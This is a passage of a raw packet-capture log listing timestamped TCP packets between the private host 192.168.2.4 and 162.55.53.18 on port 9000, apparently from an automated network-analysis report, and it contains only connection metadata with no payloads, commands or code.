Jun 19, 2024 14:40:17.932605028 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.932620049 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.932638884 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.932645082 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.932656050 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.932657003 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.932682037 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.932691097 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.932698011 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.932714939 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.932754993 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.932898045 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.932976961 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.932991028 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.933021069 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.933028936 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.933039904 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.933056116 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.933072090 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.933078051 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.933093071 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.933098078 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.933106899 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.933116913 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.933161974 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.933206081 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.933222055 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.933235884 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.933250904 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.933267117 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.933268070 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.933276892 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.933284044 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.933305979 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.933325052 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.933342934 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.933383942 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.962322950 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.962363005 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.962377071 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.962512016 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.962512016 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.017256021 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.017282009 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.017299891 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.017314911 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.017327070 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.017365932 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.017365932 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.017658949 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.017728090 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.017736912 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.017787933 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.017805099 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.017858982 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.017859936 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.017895937 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.017915964 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.017955065 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.017960072 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.018008947 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.018043995 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.018049955 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.018049955 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.018078089 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.018110991 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.018131018 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.018155098 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.020615101 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.020663023 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.020679951 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.020679951 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.020710945 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.020757914 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.020778894 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.020797014 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.020813942 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.020823002 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.020878077 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.020890951 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.020900011 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.020919085 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.020972967 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.021014929 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.021028996 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.021039009 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.021092892 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.021109104 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.021142006 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.021173954 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.021440983 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.021481037 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.021493912 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.021509886 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.021542072 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.021588087 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.021604061 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.021620989 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.021630049 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.021636963 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.021662951 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.021676064 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.021708012 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.021723986 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.021739006 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.021753073 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.021774054 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.021787882 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.021857023 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.021873951 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.021888018 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.021904945 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.021919012 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.021951914 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.021979094 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.021995068 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.022017956 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.022041082 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.022375107 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.022413969 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.022468090 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.022484064 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.022509098 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.022521973 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.022573948 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.022591114 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.022607088 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.022612095 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.022624016 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.022628069 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.022641897 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.022659063 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.022661924 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.022676945 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.022696018 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.022710085 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.022787094 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.022804022 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.022825956 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.022826910 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.022840977 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.022844076 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.022861004 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.022874117 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.022883892 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.022890091 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.022906065 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.022906065 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.022921085 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.022953987 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023130894 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023147106 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023163080 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023180962 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023186922 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023199081 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023211002 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023215055 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023231030 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023233891 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023247957 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023257017 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023266077 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023282051 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023283005 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023299932 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023307085 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023318052 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023330927 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023350000 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023360014 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023454905 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023472071 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023487091 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023494005 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023504019 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023513079 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023521900 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023525953 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023535967 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023540020 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023556948 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023564100 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023570061 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023581028 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023597956 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023607016 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023642063 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023799896 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023817062 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023833036 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023839951 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023849010 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023861885 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023865938 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023874998 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023883104 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023893118 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023900032 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023907900 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023917913 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023926973 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023936033 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023942947 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023955107 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.023957968 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023973942 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.023987055 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.024108887 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.024127007 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.024142027 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.024152040 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.024158001 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.024173021 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.024175882 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.024188042 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.024192095 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.024202108 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.024209023 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.024220943 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.024225950 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.024241924 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.024243116 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.024256945 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.024257898 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.024281025 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.024285078 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.024302959 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.024326086 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.104743004 CEST	49746	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.105294943 CEST	49752	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.110228062 CEST	9000	49746	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.110272884 CEST	9000	49752	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.110318899 CEST	49746	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.110435963 CEST	49752	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.113313913 CEST	49752	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.121279955 CEST	9000	49752	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.755187035 CEST	9000	49752	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.755270958 CEST	49752	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.755637884 CEST	49752	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.757632971 CEST	49752	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.757683992 CEST	49752	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:18.760687113 CEST	9000	49752	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.765463114 CEST	9000	49752	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.765506029 CEST	9000	49752	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.765536070 CEST	9000	49752	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.765563965 CEST	9000	49752	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:18.767859936 CEST	9000	49752	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:19.386147976 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:19.386539936 CEST	49753	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:19.391287088 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:19.391345978 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:19.391379118 CEST	9000	49753	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:19.391443968 CEST	49753	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:19.391655922 CEST	49753	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:19.396475077 CEST	9000	49753	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:19.410798073 CEST	9000	49752	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:19.410867929 CEST	49752	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:20.024842024 CEST	9000	49753	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:20.024919987 CEST	49753	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:20.025600910 CEST	49753	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:20.027770996 CEST	49753	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:20.027823925 CEST	49753	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:20.030325890 CEST	9000	49753	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:20.032497883 CEST	9000	49753	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:20.032582998 CEST	9000	49753	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:20.032685041 CEST	9000	49753	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:20.374655008 CEST	49752	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:20.374970913 CEST	49754	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:20.385309935 CEST	9000	49754	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:20.385401964 CEST	49754	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:20.385497093 CEST	9000	49752	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:20.385556936 CEST	49752	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:20.385689020 CEST	49754	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:20.390723944 CEST	9000	49754	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:20.789674044 CEST	9000	49753	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:20.789855957 CEST	49753	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:21.032355070 CEST	9000	49754	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:21.032473087 CEST	49754	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:21.032898903 CEST	49754	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:21.034697056 CEST	49754	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:21.038887024 CEST	9000	49754	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:21.040023088 CEST	9000	49754	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:21.459652901 CEST	49753	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:21.460072041 CEST	49755	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:21.465305090 CEST	9000	49755	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:21.465414047 CEST	9000	49753	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:21.465467930 CEST	49753	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:21.465568066 CEST	49755	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:21.465660095 CEST	49755	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:21.472014904 CEST	9000	49755	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:21.825462103 CEST	9000	49754	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:21.825542927 CEST	49754	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:22.110245943 CEST	9000	49755	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:22.110476017 CEST	49755	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:22.110821009 CEST	49755	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:22.112657070 CEST	49755	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:22.115636110 CEST	9000	49755	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:22.117731094 CEST	9000	49755	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:22.495486975 CEST	49754	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:22.495985985 CEST	49756	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:22.500932932 CEST	9000	49754	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:22.500972986 CEST	9000	49756	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:22.501020908 CEST	49754	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:22.501072884 CEST	49756	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:22.501348972 CEST	49756	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:22.506180048 CEST	9000	49756	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:23.534471035 CEST	9000	49755	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:23.534714937 CEST	9000	49755	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:23.534719944 CEST	49755	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:23.534751892 CEST	9000	49756	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:23.534811020 CEST	49755	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:23.534818888 CEST	49756	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:23.534828901 CEST	9000	49755	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:23.534857988 CEST	9000	49756	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:23.534895897 CEST	49755	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:23.534915924 CEST	49756	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:23.536556005 CEST	49756	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:23.537647963 CEST	49756	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:23.540013075 CEST	49757	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:23.541779041 CEST	9000	49756	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:23.544729948 CEST	9000	49756	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:23.544791937 CEST	49756	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:23.544987917 CEST	9000	49757	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:23.545075893 CEST	49757	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:23.545339108 CEST	49757	9000	192.168.2.4	162.55.53.18
